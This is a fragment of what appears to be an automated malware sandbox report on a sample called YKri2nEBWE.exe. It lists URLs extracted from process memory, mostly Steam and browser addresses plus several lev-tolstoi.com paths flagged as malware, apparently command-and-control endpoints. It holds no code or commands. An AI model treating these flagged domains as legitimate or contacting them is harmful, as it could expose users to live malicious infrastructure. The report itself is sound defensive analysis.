                                                                                      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRiYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1YKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatiSYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.j3YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://lev-tolstoi.com/YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282630199.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001532000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368499776.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283684889.0000000005DF0000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283078885.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://store.steampowered.com/privacy_agreement/YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.comYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://store.steampowered.com/points/shop/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://ocsp.rootca1.amazontrust.com0:YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://community.yYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=sYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.ecosia.org/newtab/YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/YKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brYKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://store.steampowered.com/privacy_agreement/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportecYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/about/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/my/wishlist/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://community.fastly.steamstatic.ccYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://help.steampowered.com/en/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://steamcommunity.com/market/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://store.steampowered.com/news/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://store.steampowered.com/subscriber_agreement/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgYKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://lev-tolstoi.com/apilYKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                    		unknown
                                                                                                                                                    https://community.=YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/gYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://lev-tolstoi.com/apixYKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://lev-tolstoi.com/apisYKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://steamcommunity.com/discussions/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fastly.steambYKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://store.steampowered.com/stats/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/steam_refunds/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://lev-tolstoi.com/uo0YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://x1.c.lencr.org/0YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://x1.i.lencr.org/0YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchYKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://lev-tolstoi.com/apimCYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://steamcommunity.com/workshop/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allYKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://store.steampowered.com/legal/YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://lev-tolstoi.com/apiBYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/publicYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoYKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://lev-tolstoi.com/0YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      https://steamcommunity.com/linkfilteYKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://store.steampowered.com/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=eYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
